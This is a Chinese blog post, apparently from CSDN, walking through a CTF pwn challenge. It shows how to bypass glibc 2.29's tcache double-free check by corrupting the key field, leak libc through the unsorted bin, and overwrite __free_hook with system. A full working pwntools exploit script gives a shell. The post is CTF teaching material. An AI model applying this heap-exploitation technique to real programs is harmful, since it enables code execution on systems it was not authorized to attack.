i春秋2020新春战役PWN之document(绕过tcache的double free检测)

最新推荐文章于 2023-12-08 14:44:46 发布
最新推荐文章于 2023-12-08 14:44:46 发布
阅读量3k 收藏 3
点赞数
分类专栏: pwn CTF 二进制漏洞 文章标签: 安全 PWN CTF 二进制漏洞 缓冲区溢出
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/seaaseesa/article/details/104531134
版权
pwn 同时被 3 个专栏收录
161 篇文章 24 订阅
订阅专栏
CTF
161 篇文章 9 订阅
订阅专栏
二进制漏洞
161 篇文章 9 订阅
订阅专栏

Document

首先,检查一下程序的保护机制

然后,我们用IDA分析一下,经典的增删改查程序

Delete功能没有清空指针,存在UAF漏洞

Create功能的size不可控

UAF无法修改到*heap处的内容,也就是next指针的值

Create功能最多允许创建7个堆

题目给我们的glibc版本为2.29,存在tcache机制,且增加了对tcache double free的检查。

  1. typedef struct tcache_entry  
  2. {  
  3.   /*指向下一个空闲chunk*/  
  4.   struct tcache_entry *next;  
  5.   /* 用来检测double free*/  
  6.   struct tcache_perthread_struct *key;  
  7. } tcache_entry;  

让我们来看看是如何检测的吧

  1. /* Check to see if it's already in the tcache.  */  
  2. tcache_entry *e = (tcache_entry *) chunk2mem (p);  
  3.   
  4. /* This test succeeds on double free.  However, we don't 100% 
  5.    trust it (it also matches random payload data at a 1 in 
  6.    2^<size_t> chance), so verify it's not an unlikely 
  7.    coincidence before aborting.  */  
  8. if (__glibc_unlikely (e->key == tcache)) {  
  9.     tcache_entry *tmp;  
  10.     LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);  
  11.     for (tmp = tcache->entries[tc_idx];  
  12.             tmp;  
  13.             tmp = tmp->next)  
  14.         if (tmp == e)  
  15.             malloc_printerr ("free(): double free detected in tcache 2");  
  16.     /* If we get here, it was a coincidence.  We've wasted a 
  17.        few cycles, but don't abort.  */  
  18. }  

显然,如果我们让e->key == tcache不成立,就能够double free了。

而之前,我们分析了edit函数,changeSex功能可以修改key指针的低1字节,那么就能使得这个不再成立。于是,我们先用double free来将0x90的tcache bin填满7个。

  1. #0  
  2. create('a'*0x8,'a'*0x70)  
  3. #1  
  4. create('b'*0x8,'b'*0x70)  
  5. #2  
  6. create('c'*0x8,'c'*0x70)  
  7. #3  
  8. create('d'*0x8,'d'*0x70)  
  9.   
  10. delete(0)  
  11. #修改key,偏移1,绕过了double free检查  
  12. edit(0,'a'*0x70)  
  13. delete(0)  
  14.   
  15. delete(1)  
  16. edit(1,'a'*0x70)  
  17.   
  18. delete(2)  
  19. #修改key,偏移1,绕过了double free检查  
  20. edit(2,'a'*0x70)  
  21. delete(2)  
  22.   
  23. delete(3)  
  24. #修改key,偏移1,绕过了double free检查  
  25. edit(3,'a'*0x70)  
  26. delete(3)  

接下来,继续delete,就能将chunk放入unsorted bin了,再利用UAF泄露地址。

  1. #由于前面,把tcache给填满了,现在这个就放入unsorted bin  
  2. delete(1)  
  3. show(1)  
  4.   
  5. sh.recvuntil('\n')  
  6. main_arena_88 = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))  
  7. malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)  
  8. libc_base = malloc_hook_addr - malloc_hook_s  
  9. free_hook_addr = libc_base + free_hook_s  
  10. system_addr = libc_base + system_s  
  11. print 'libc_base=',hex(libc_base)  
  12. print 'free_hook_addr=',hex(free_hook_addr)  
  13. print 'system_addr=',hex(system_addr)  

现在,堆布局是这样的

那么,就能很容易利用了。我们的完整exp脚本

#coding:utf8
from pwn import *

sh = process('./document')
#sh = remote('node3.buuoj.cn',26208)
libc = ELF('/usr/lib/x86_64-linux-gnu/libc-2.29.so')
malloc_hook_s = libc.symbols['__malloc_hook']
free_hook_s = libc.symbols['__free_hook']
system_s = libc.sym['system']

def create(name,content):
   sh.sendlineafter('Give me your choice :','1')
   sh.sendafter('input name',name)
   sh.sendafter('input sex','M')
   sh.sendafter('input information',content)

def show(index):
   sh.sendlineafter('Give me your choice :','2')
   sh.sendlineafter('Give me your index :',str(index))

def edit(index,content,changeSex = 'Y'):
   sh.sendlineafter('Give me your choice :','3')
   sh.sendlineafter('Give me your index :',str(index))
   #这一步至关重要
   sh.sendafter('Are you sure change sex?',changeSex)
   sh.sendafter('Now change information',content)

def delete(index):
   sh.sendlineafter('Give me your choice :','4')
   sh.sendlineafter('Give me your index :',str(index))

#0
create('a'*0x8,'a'*0x70)
#1
create('b'*0x8,'b'*0x70)
#2
create('c'*0x8,'c'*0x70)
#3
create('d'*0x8,'d'*0x70)

delete(0)
#修改key,偏移1,绕过了double free检查
edit(0,'a'*0x70)
delete(0)

delete(1)
edit(1,'a'*0x70)

delete(2)
#修改key,偏移1,绕过了double free检查
edit(2,'a'*0x70)
delete(2)

delete(3)
#修改key,偏移1,绕过了double free检查
edit(3,'a'*0x70)
delete(3)

#由于前面,把tcache给填满了,现在这个就放入unsorted bin里
delete(1)
show(1)

sh.recvuntil('\n')
main_arena_88 = u64(sh.recvuntil('\n',drop = True).ljust(8,'\x00'))
malloc_hook_addr = (main_arena_88 & 0xFFFFFFFFFFFFF000) + (malloc_hook_s & 0xFFF)
libc_base = malloc_hook_addr - malloc_hook_s
free_hook_addr = libc_base + free_hook_s
system_addr = libc_base + system_s
print 'libc_base=',hex(libc_base)
print 'free_hook_addr=',hex(free_hook_addr)
print 'system_addr=',hex(system_addr)

#将free_hook_addr链接到tcache bin
create(p64(free_hook_addr),'a'*0x70) #4
create('/bin/sh\x00','a'*0x70) #5
#写free_hook
create(p64(system_addr),'a'*0x70) #6
#getshell
delete(5)

sh.interactive()

 

ha1vk
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
i 春秋月刊第六期:Linux pwn 零基础入门
10-23
i 春秋月刊第六期:Linux pwn 零基础入门
PWN 强网杯2020siri 题目
09-21
PWN 强网杯2020siri 题目
double free detected in tcache 2问题记录
最新发布
Z_oioihoii
12-08 218
解释,当执行free(b);时会报错,因为在 b->Test();调用时已经执行了delete this;将堆区的内存释放掉,此时再次根据b的地址去释放会发现不存在,所以报错double free detected in tcache 2。
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 在exploits文件夹中使用python3运行HTTP服务器。 $ python3 -m http.server 80 通过Safari使用攻击者服务器的IP访问网站: http://[attacker_ip]/exploit.html 等待计算器(通常会在十秒钟内弹出,但如果不走运,将需要一些时间)和一个具有内核特权的终端。 为了显示我们的内核特权升级,我们禁用了SIP。 您可以通过运行csrutil status命令进行检查,
build-an-efficient-pwn-environment:如何在2020年建立高效的Pwn开发环境
05-26
2020年建立高效的Pwn开发环境 多年以来,每当我决定开始学习pwn时,我发现我无法编写漏洞利用程序或无法高效地调试可执行文件。 我最终决定做些改变这种情况的事情。 所以我花了一些时间在相关工具的使用上。 我什至开发了一些脚本和工具来帮助我获得更好的体验。 现在,到2020年,您将拥有一个更高效的pwn开发环境。 您可以在上面的GIF中瞥一眼最终环境。 在本文中,我将向您展示如何构建该环境。 Arch Linux 如果您想拥有一个ELF ,首先需要一个Linux发行版。 我使用 ,该具有强大的来安装各种软件,以下所有部分均基于此。 如果您使用其他Linux发行版甚至是macOS,则可能需要找到在计算机上安装某些软件包的方法。 但是以下配置仍然对您有用。 或者,如果您不想通过命令行安装Linux发行,则可以只切换到或 。 您可能会发现许多文章仍在教您如何使用yaou
linux_pwn(6)--tcache&&double free&&ciscn_2019_final_3
azraelxuemo的博客
03-10 1459
文章目录What is tcachepwn题例题检查代码分析add函数delete函数准备框架attack修改大小为unsorted bin范围free成unsorted bin难点,怎么泄露libcdouble free free_hook总结 What is tcache tcache是libc2.26之后引进的一种新机制,类似于fastbin一样的东西,每条链上最多可以有 7 个 chunk,free的时候当tcache满了才放入fastbin,unsorted bin,malloc的时候优先去tca
Tcache bin总结
N1rvana的博客
03-13 1528
Tcache Tcache是glibc 2.26之后引入的机制,与glibc 2.23版本下堆利用方式有一定区别,产生了新的利用方式。 0x1 相关结构体 tcache_entry typedef struct tcache_entry { struct tcache_entry *next; } tcache_entry; tcache_entry用来链接空闲的tcache chunk,其中的next指针指向下一个大小相同的空闲tcache chunk。 注意:这里的next指针指向的是user
lonelywolf_exp(tcache double free)
qq_33590156的博客
08-04 159
题目只能申请一个chunk指针,但是可以重复申请chunk,而且存在uaf,不可溢出 首先绕过tcache的check使用double free泄露堆地址(老版本是可以直接free的,但是新版本需要free后edit一下再free),然后通过uaf在tcache中存放好两个指针,一个用来修改size,一个用来free chunk,之后申请0x70chunk,和另一个chunk防止合并。接着通过第一根指针修改size>0x80,然后通过第二根指针free此chunk,使用double free将他fre
利用全局chunk数组,free(负数)来实现tcache double free
tbsqigongzi的博客
10-17 134
ciscn_2019_ne_6
free(): double free detected in tcache 2 如何解决
热门推荐
qq_49101164的博客
04-19 3万+
free(): double free detected in tcache 2 如何解决 原因 free():在tcache 2中检测到双空闲,在执行程序的过程中对同一块内存单元进行了两次free()操作。 在循环中包含free();语句,容易出现这类问题。 解决方法 可以设置两个指针,进行操作,下面给出示范 出现double free() 的报错 只设置了一个指针变量n,在循环的过程中,会再次对n进行free();操作因此会出现此次问题 double free()得到解决 设置两个指针变量,
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
heap pwn 入门大全 - 2:glibc heap机制与源码阅读(下)
Zheng__Huang的博客
08-13 444
本文对glibc堆管理器的各项主要内存操作,以及glibc 2.26后引入的tcache机制进行源码级分析,可作为查找使用。
hitcon_ctf_2019_one_punch(libc2.29 tcache tashing unlink)
m0_51251108的博客
09-30 890
libc2.29 tcache tashing unlink
[总结型]记CTF PWN中过气的堆利用
easy_level1的博客
04-15 1236
目录前言不再好用的unsorted bin attack不可能的tcache double free 前言 how2heap(https://github.com/shellphish/how2heap)可以说是目前"权威"的glibc中的heap exploitation techniques文档。在学术界近年的一些顶会文章也有引用这个github项目。 攻防对抗是一直持续发展的,很容易在学习中,复现一些过时的攻击技术出现困难,原因就是已经有补丁打上了。本文大致总结一些在比赛中常见的过时技术,持续更新…吧
[BUUCTF]PWN——[V&N2020 公开赛]easyTHeap
mcmuyanga的博客
01-04 261
[V&N2020 公开赛]easyTHeap 附件 步骤: 例行检查,64位程序,保护全开 本地试运行一下,看看大概的情况,常见的堆的菜单 64位ida载入,main函数 最多只能申请7个chunk,delete只能执行3次 add() add函数只能创建一个chunk,不能读入数据,读入数据需要用到edit函数 edit() show() delete() 这题的libc是2.27,在libc2.26之后的libc版本中加入了新的存储结构tcache,这使得我们利用堆的时候要特别注
段错误 (核心已转储) + free(): double free detected in tcache 2 已放弃 (核心已转储)
Kearney
07-05 8408
status $ ./server 段错误 (核心已转储) # another terminal $ ./client File transfer success! free(): double free detected in tcache 2 已放弃 (核心已转储) 文件正常接受 sulotion 万事先搜索 free(): double free detected in tcache 2 如何解决 从此为bug秃头 2021-04-19 free():在tcache 2中检测到双空闲,在执行程
C++11新特性2(右值引用和移动语义)
qq_57177980的博客
06-08 177
C++11在性能上做了很大的改进,最大程度减少了内存移动和复制,通过右值引用、forward、emplace和一些无序容器我们可以大幅度改进程序性能。 右值引用仅仅是通过改变资源的所有者(剪切方式而不是拷贝方式)来避免内存的拷贝,能大幅提高性能。 forward能根据参数的实际类型转发给正确的函数(参数用&&的方式)。 emplace系列函数通过直接构造对象的方式避免了内存的拷贝和移动。
解释深浅拷贝问题,并且使用代码示例描述
huangzx12138的博客
10-07 327
浅拷贝即只复制对象的引用,所以副本最终也是指向父对象在堆内存中的对象,无论是副本还是父对象修改了这个对象,副本或者父对象都会因此发生同样的改变;   而深拷贝则是直接复制父对象在堆内存中的对象,最终在堆内存中生成一个独立的,与父对象无关的新对象。深拷贝的对象虽然与父对象无关,但是却与父对象一致。当深拷贝完成之后,如果对父对象进行了改变,不会影响到深拷贝的副本,同理反之亦然。
动手实现一个小内存管理库
weixin_42136255的博客
12-23 1342
自己动手实现一个小内存管理库
pwn unlink
08-27
而"unlink"是一种特定的攻击技术,用于利用堆溢出漏洞来篡改数据结构中的指针,从而绕过保护机制实现任意内存写入或代码执行。 具体来说,在一些使用了堆分配的程序中,如果程序中存在堆溢出漏洞,攻击者可以通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值